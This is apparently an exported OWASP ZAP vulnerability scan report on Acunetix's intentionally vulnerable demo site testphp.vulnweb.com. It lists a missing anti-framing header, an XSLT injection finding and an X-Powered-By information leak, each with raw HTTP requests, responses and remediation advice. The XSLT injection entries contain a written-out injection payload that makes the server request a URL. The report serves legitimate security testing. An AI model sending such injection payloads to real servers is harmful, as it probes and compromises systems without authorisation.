InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>searched for: ZAP</h2></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/secured/newuser.php |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 351 bytes. |
POST http://testphp.vulnweb.com/secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com/signup.php Content-Length: 96 |
Request Body - size: 96 bytes. |
uuname=ZAP&upass=ZAP&upass2=ZAP&urname=ZAP&ucc=ZAP&uemail=ZAP&uphone=ZAP&uaddress=&signup=signup
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 733 |
Response Body - size: 733 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title>add new user</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link href="style.css" rel="stylesheet" type="text/css"> </head> <body> <div id="masthead"> <h1 id="siteName">ACUNETIX ART</h1> </div> <div id="content"> <p>You have been introduced to our database with the above informations:</p><ul><li>Username: ZAP</li><li>Password: ZAP</li><li>Name: ZAP</li><li>Address: </li><li>E-Mail: ZAP</li><li>Phone number: ZAP</li><li>Credit card: ZAP</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div> </body> </html> |
Instances | 43 |
Solution |
Modern Web browsers support the Content-Security-Policy and X-Frame-Options HTTP headers. Ensure one of them is set on all web pages returned by your site/app.
If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
|
Reference | https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options |
Tags |
OWASP_2021_A05
WSTG-v42-CLNT-09 OWASP_2017_A06 |
CWE Id | 1021 |
WASC Id | 15 |
Plugin Id | 10020 |
Medium |
XSLT Injection |
---|---|
Description |
Injection using XSL transformations may be possible, and may allow an attacker to read system information, read and write files, or execute arbitrary code.
|
URL | http://testphp.vulnweb.com/showimage.php?file=%3Cxsl%3Avalue-of+select%3D%22document%28%27http%3A%2F%2Ftestphp.vulnweb.com%3A22%27%29%22%2F%3E |
Method | GET |
Parameter | file |
Attack | <xsl:value-of select="document('http://testphp.vulnweb.com:22')"/> |
Evidence | failed to open stream |
Request Header - size: 389 bytes. |
GET http://testphp.vulnweb.com/showimage.php?file=%3Cxsl%3Avalue-of+select%3D%22document%28%27http%3A%2F%2Ftestphp.vulnweb.com%3A22%27%29%22%2F%3E HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=2 |
Request Body - size: 0 bytes. |
|
Response Header - size: 207 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:44:58 GMT Content-Type: image/jpeg Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 286 |
Response Body - size: 286 bytes. |
Warning: fopen(<xsl:value-of select="document('http://testphp.vulnweb.com:22')"/>): failed to open stream: No such file or directory in /hj/var/www/showimage.php on line 13
Warning: fpassthru() expects parameter 1 to be resource, boolean given in /hj/var/www/showimage.php on line 19 |
URL | http://testphp.vulnweb.com/showimage.php?file=%3Cxsl%3Avalue-of+select%3D%22document%28%27http%3A%2F%2Ftestphp.vulnweb.com%3A22%27%29%22%2F%3E&size=160 |
Method | GET |
Parameter | file |
Attack | <xsl:value-of select="document('http://testphp.vulnweb.com:22')"/> |
Evidence | failed to open stream |
Request Header - size: 398 bytes. |
GET http://testphp.vulnweb.com/showimage.php?file=%3Cxsl%3Avalue-of+select%3D%22document%28%27http%3A%2F%2Ftestphp.vulnweb.com%3A22%27%29%22%2F%3E&size=160 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=2 |
Request Body - size: 0 bytes. |
|
Response Header - size: 207 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:45:00 GMT Content-Type: image/jpeg Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 286 |
Response Body - size: 286 bytes. |
Warning: fopen(<xsl:value-of select="document('http://testphp.vulnweb.com:22')"/>): failed to open stream: No such file or directory in /hj/var/www/showimage.php on line 31
Warning: fpassthru() expects parameter 1 to be resource, boolean given in /hj/var/www/showimage.php on line 37 |
Instances | 2 |
Solution |
Sanitize and analyze every user input coming from any client-side.
|
Reference | https://www.contextis.com/blog/xslt-server-side-injection-attacks |
Tags |
OWASP_2021_A03
OWASP_2017_A01 |
CWE Id | 91 |
WASC Id | 23 |
Plugin Id | 90017 |
Low |
Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s) |
---|---|
Description |
The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.
|
URL | http://testphp.vulnweb.com |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 213 bytes. |
GET http://testphp.vulnweb.com HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:43 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4958 |
Response Body - size: 4,958 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>Home of Acunetix Art</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id="pageName">welcome to our page</h2> <div class="story"> <h3>Test site for Acunetix WVS.</h3> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/ |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 447 bytes. |
GET http://testphp.vulnweb.com/ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: cross-site Sec-Fetch-User: ?1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:14:55 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4958 |
Response Body - size: 4,958 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>Home of Acunetix Art</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id="pageName">welcome to our page</h2> <div class="story"> <h3>Test site for Acunetix WVS.</h3> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/AJAX/artists.php |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 303 bytes. |
GET http://testphp.vulnweb.com/AJAX/artists.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: */* Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/AJAX/index.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 219 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:18:38 GMT Content-Type: text/xml;charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 146 |
Response Body - size: 146 bytes. |
<items><item name="infoartist" id="1">r4w8173</item><item name="infoartist" id="2">Blad3</item><item name="infoartist" id="3">lyzae</item></items>
|
URL | http://testphp.vulnweb.com/AJAX/categories.php |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 306 bytes. |
GET http://testphp.vulnweb.com/AJAX/categories.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: */* Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/AJAX/index.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 219 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:18:49 GMT Content-Type: text/xml;charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 195 |
Response Body - size: 195 bytes. |
<items><item name="infocateg" id="1">Posters</item><item name="infocateg" id="2">Paintings</item><item name="infocateg" id="3">Stickers</item><item name="infocateg" id="4">Graffity</item></items>
|
URL | http://testphp.vulnweb.com/AJAX/index.php |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 265 bytes. |
GET http://testphp.vulnweb.com/AJAX/index.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:48 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4236 |
Response Body - size: 4,236 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>ajax test</title> <link href="styles.css" rel="stylesheet" type="text/css" /> <script type="text/javascript"> var httpreq = null; function SetContent(XML) { var items = XML.getElementsByTagName('items').item(0).getElementsByTagName('item'); var inner = '<ul>'; for(i=0; i<items.length; i++){ inner = inner + '<li><a href="javascript:getInfo(\'' + items[i].attributes.item(0).value + '\', \'' + items[i].attributes.item(1).value + '\')">' + items[i].firstChild.nodeValue + '</a></li>'; } inner = inner + '</ul>' cd = document.getElementById('contentDiv'); cd.innerHTML = inner; id = document.getElementById('infoDiv'); id.innerHTML = ''; } function httpCompleted() { if (httpreq.readyState==4 && httpreq.status==200) { SetContent(httpreq.responseXML); httpreq = null; } } function SetInfo(XML) { var ii = XML.getElementsByTagName('iteminfo').item(0); var inner = ''; inner = inner + '<p><strong>' + ii.getElementsByTagName('name').item(0).firstChild.nodeValue + '</strong></p>'; pict = ii.getElementsByTagName('picture'); if(pict.length>0){ inner = inner + '<img src="../showimage.php?file=' + pict.item(0).firstChild.nodeValue + '"/>'; } descs = ii.getElementsByTagName('description'); for (i=0; i<descs.length; i++){ inner = inner + '<p>' + descs.item(i).firstChild.nodeValue + '</p>'; } id = document.getElementById('infoDiv'); id.innerHTML = inner; } function httpInfoCompleted() { if (httpreq.readyState==4 && httpreq.status==200) { SetInfo(httpreq.responseXML); httpreq = null; } } function loadSomething(what) { getHttpRequest(); httpreq.open('GET', what, true); httpreq.send(''); } function getInfo(where, which) { getHttpRequest(); httpreq.onreadystatechange = httpInfoCompleted; if (where=='infotitle'){ httpreq.open('POST', where+'.php', true); httpreq.setRequestHeader('content-type', 'application/x-www-form-urlencoded'); httpreq.send('id='+which); } else { httpreq.open('GET', where+'.php?id='+which, true); httpreq.send(''); } } function xmlCompleted () { if (httpreq.readyState==4 && httpreq.status==200) { xd = document.getElementById('xmlDiv'); xd.innerHTML = httpreq.responseText; httpreq = null; } } function sendXML () { getHttpRequest(); httpreq.onreadystatechange = xmlCompleted; httpreq.open('POST', 'showxml.php'); httpreq.setRequestHeader('content-type', 'text/xml'); httpreq.send('<xml><node name="nodename1">nodetext1</node><node name="nodename2">nodetext2</node></xml>'); } function getHttpRequest() { // free the curent one if (httpreq!=null){ httpreq.abort(); httpreq = null; } if( window.XMLHttpRequest ) { httpreq = new XMLHttpRequest(); if (httpreq.overrideMimeType) { httpreq.overrideMimeType('text/xml'); } } else if(ActiveXObject) { httpreq = new ActiveXObject("Msxml2.XMLHTTP"); } httpreq.onreadystatechange = httpCompleted; } function SetMyCookie() { document.cookie = "mycookie=3"; alert('A cookie was set by JavaScript.'); } </script> </head> <body> <table border="0" cellpadding="3" width="500" align="center"> <tr> <td class="bordered"> <a href="javascript:loadSomething('artists.php');">artists</a> | <a href="javascript:loadSomething('categories.php');">categories</a> | <a href="#" onclick="loadSomething('titles.php')">titles</a> | <a href="#" onclick="sendXML()">send xml</a> | <a href="#" onclick="SetMyCookie()">setcookie</a> </td> </tr> <tr> <td> <div id="contentDiv"> </div> </td> </tr> <tr> <td> <div id="infoDiv"> </div> </td> </tr> <tr> <td> <div id="xmlDiv"> </div> </td> </tr> </table> </body> </html> |
URL | http://testphp.vulnweb.com/AJAX/infoartist.php?id=1 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 311 bytes. |
GET http://testphp.vulnweb.com/AJAX/infoartist.php?id=1 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: */* Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/AJAX/index.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 220 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:18:40 GMT Content-Type: text/xml;charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 1343 |
Response Body - size: 1,343 bytes. |
<iteminfo><name>r4w8173</name><description><p>
Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p> <p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p></description></iteminfo> |
URL | http://testphp.vulnweb.com/AJAX/infoartist.php?id=2 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 311 bytes. |
GET http://testphp.vulnweb.com/AJAX/infoartist.php?id=2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: */* Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/AJAX/index.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 220 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:18:58 GMT Content-Type: text/xml;charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 1285 |
Response Body - size: 1,285 bytes. |
<iteminfo><name>Blad3</name><description><p>
Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p> <p> Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo. Praesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a mauris vulputate lacinia. Aenean viverra. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos hymenaeos. Aliquam lacus. Mauris magna eros, semper a, tempor et, rutrum et, tortor. </p></description></iteminfo> |
URL | http://testphp.vulnweb.com/AJAX/infoartist.php?id=3 |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 |
Request Header - size: 311 bytes. |
GET http://testphp.vulnweb.com/AJAX/infoartist.php?id=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: */* Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/AJAX/index.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 220 bytes. |
HTTP/1.1 200 OK
